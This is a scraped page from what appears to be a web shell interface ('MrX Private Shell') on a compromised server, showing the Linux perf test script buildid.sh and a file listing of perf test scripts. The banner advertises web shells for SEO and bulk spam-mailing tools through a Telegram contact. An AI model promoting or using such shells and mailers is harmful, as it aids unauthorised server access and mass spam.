__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
#!/bin/sh
# build id cache operations
# SPDX-License-Identifier: GPL-2.0

# skip if there's no readelf
if ! [ -x "$(command -v readelf)" ]; then
	echo "failed: no readelf, install binutils"
	exit 2
fi

# skip if there's no compiler
if ! [ -x "$(command -v cc)" ]; then
	echo "failed: no compiler, install gcc"
	exit 2
fi

# check what we need to test windows binaries
add_pe=1
run_pe=1
if ! perf version --build-options | grep -q 'libbfd: .* on '; then
	echo "WARNING: perf not built with libbfd. PE binaries will not be tested."
	add_pe=0
	run_pe=0
fi
if ! which wine > /dev/null; then
	echo "WARNING: wine not found. PE binaries will not be run."
	run_pe=0
fi

# set up wine
if [ ${run_pe} -eq 1 ]; then
	wineprefix=$(mktemp -d /tmp/perf.wineprefix.XXX)
	export WINEPREFIX=${wineprefix}
	# clear display variables to prevent wine from popping up dialogs
	unset DISPLAY
	unset WAYLAND_DISPLAY
fi

ex_md5=$(mktemp /tmp/perf.ex.MD5.XXX)
ex_sha1=$(mktemp /tmp/perf.ex.SHA1.XXX)
ex_pe=$(dirname $0)/../pe-file.exe

echo 'int main(void) { return 0; }' | cc -Wl,--build-id=sha1 -o ${ex_sha1} -x c -
echo 'int main(void) { return 0; }' | cc -Wl,--build-id=md5 -o ${ex_md5} -x c -

echo "test binaries: ${ex_sha1} ${ex_md5} ${ex_pe}"

check()
{
	case $1 in
	*.exe)
		# We don't have a tool that can pull a nicely formatted build-id out of
		# a PE file, but we can extract the whole section with objcopy and
		# format it ourselves. The .buildid section is a Debug Directory
		# containing a CodeView entry:
		#     https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#debug-directory-image-only
		#     https://github.com/dotnet/runtime/blob/da94c022576a5c3bbc0e896f006565905eb137f9/docs/design/specs/PE-COFF.md
		# The build-id starts at byte 33 and must be rearranged into a GUID.
		id=`objcopy -O binary --only-section=.buildid $1 /dev/stdout | \
			cut -c 33-48 | hexdump -ve '/1 "%02x"' | \
			sed 's@^\(..\)\(..\)\(..\)\(..\)\(..\)\(..\)\(..\)\(..\)\(.*\)0a$@\4\3\2\1\6\5\8\7\9@'`
		;;
	*)
		id=`readelf -n ${1} 2>/dev/null | grep 'Build ID' | awk '{print $3}'`
		;;
	esac
	echo "build id: ${id}"

	id_file=${id#??}
	id_dir=${id%$id_file}
	link=$build_id_dir/.build-id/$id_dir/$id_file
	echo "link: ${link}"

	if [ ! -h $link ]; then
		echo "failed: link ${link} does not exist"
		exit 1
	fi

	file=${build_id_dir}/.build-id/$id_dir/`readlink ${link}`/elf
	echo "file: ${file}"

	# Check for file permission of original file
	# in case of pe-file.exe file
	echo $1 | grep ".exe"
	if [ $? -eq 0 ]; then
		if [ -x $1 ] && [ ! -x $file ]; then
			echo "failed: file ${file} executable does not exist"
			exit 1
		fi

		if [ ! -x $file ] && [ ! -e $file ]; then
			echo "failed: file ${file} does not exist"
			exit 1
		fi
	elif [ ! -x $file ]; then
		echo "failed: file ${file} does not exist"
		exit 1
	fi

	diff ${file} ${1}
	if [ $? -ne 0 ]; then
		echo "failed: ${file} do not match"
		exit 1
	fi

	${perf} buildid-cache -l | grep ${id}
	if [ $? -ne 0 ]; then
		echo "failed: ${id} is not reported by \"perf buildid-cache -l\""
		exit 1
	fi

	echo "OK for ${1}"
}

test_add()
{
	build_id_dir=$(mktemp -d /tmp/perf.debug.XXX)
	perf="perf --buildid-dir ${build_id_dir}"

	${perf} buildid-cache -v -a ${1}
	if [ $? -ne 0 ]; then
		echo "failed: add ${1} to build id cache"
		exit 1
	fi

	check ${1}

	rm -rf ${build_id_dir}
}

test_record()
{
	data=$(mktemp /tmp/perf.data.XXX)
	build_id_dir=$(mktemp -d /tmp/perf.debug.XXX)
	log_out=$(mktemp /tmp/perf.log.out.XXX)
	log_err=$(mktemp /tmp/perf.log.err.XXX)
	perf="perf --buildid-dir ${build_id_dir}"

	echo "running: perf record $*"
	${perf} record --buildid-all -o ${data} "$@" 1>${log_out} 2>${log_err}
	if [ $? -ne 0 ]; then
		echo "failed: record $*"
		echo "see log: ${log_err}"
		exit 1
	fi

	args="$*"
	check ${args##* }

	rm -f ${log_out} ${log_err}
	rm -rf ${build_id_dir}
	rm -rf ${data}
}

# add binaries manual via perf buildid-cache -a
test_add ${ex_sha1}
test_add ${ex_md5}
if [ ${add_pe} -eq 1 ]; then
	test_add ${ex_pe}
fi

# add binaries via perf record post processing
test_record ${ex_sha1}
test_record ${ex_md5}
if [ ${run_pe} -eq 1 ]; then
	test_record wine ${ex_pe}
fi

# cleanup
rm ${ex_sha1} ${ex_md5}
if [ ${run_pe} -eq 1 ]; then
	rm -r ${wineprefix}
fi

exit 0

Filemanager

Name Type Size Permission Actions
base_probe Folder 0755
base_report Folder 0755
common Folder 0755
coresight Folder 0755
lib Folder 0755
annotate.sh File 2.08 KB 0755
attr.sh File 385 B 0755
buildid.sh File 4.15 KB 0755
daemon.sh File 11.31 KB 0755
diff.sh File 1.93 KB 0755
ftrace.sh File 2.22 KB 0755
list.sh File 756 B 0755
lock_contention.sh File 8.9 KB 0755
perftool-testsuite_probe.sh File 575 B 0755
perftool-testsuite_report.sh File 578 B 0755
pipe_test.sh File 3.22 KB 0755
probe_vfs_getname.sh File 440 B 0755
record+probe_libc_inet_pton.sh File 3.43 KB 0755
record+script_probe_vfs_getname.sh File 1.53 KB 0755
record+zstd_comp_decomp.sh File 1.12 KB 0755
record.sh File 8.27 KB 0755
record_bpf_filter.sh File 4.37 KB 0755
record_lbr.sh File 3.46 KB 0755
record_offcpu.sh File 2.07 KB 0755
record_sideband.sh File 1.07 KB 0755
script.sh File 2.01 KB 0755
stat+csv_output.sh File 2 KB 0755
stat+csv_summary.sh File 611 B 0755
stat+json_output.sh File 5.02 KB 0755
stat+shadow_stat.sh File 2.08 KB 0755
stat+std_output.sh File 2.96 KB 0755
stat.sh File 6.36 KB 0755
stat_all_metricgroups.sh File 1016 B 0755
stat_all_metrics.sh File 1.83 KB 0755
stat_all_pfm.sh File 1.17 KB 0755
stat_all_pmu.sh File 1.73 KB 0755
stat_bpf_counters.sh File 2 KB 0755
stat_bpf_counters_cgrp.sh File 1.66 KB 0755
stat_metrics_values.sh File 844 B 0755
test_arm_callgraph_fp.sh File 1.18 KB 0755
test_arm_coresight.sh File 5.7 KB 0755
test_arm_coresight_disasm.sh File 1.97 KB 0755
test_arm_spe.sh File 3.71 KB 0755
test_arm_spe_fork.sh File 1.03 KB 0755
test_brstack.sh File 2.97 KB 0755
test_data_symbol.sh File 1.95 KB 0755
test_intel_pt.sh File 17.2 KB 0755
test_java_symbol.sh File 1.96 KB 0755
test_perf_data_converter_json.sh File 1.32 KB 0755
test_stat_intel_tpebs.sh File 848 B 0755
test_task_analyzer.sh File 4.8 KB 0755
test_uprobe_from_different_cu.sh File 1.63 KB 0755
trace+probe_vfs_getname.sh File 1.45 KB 0755
trace_btf_enum.sh File 1.35 KB 0755
trace_btf_general.sh File 2.03 KB 0755
trace_exit_race.sh File 1.22 KB 0755
Filemanager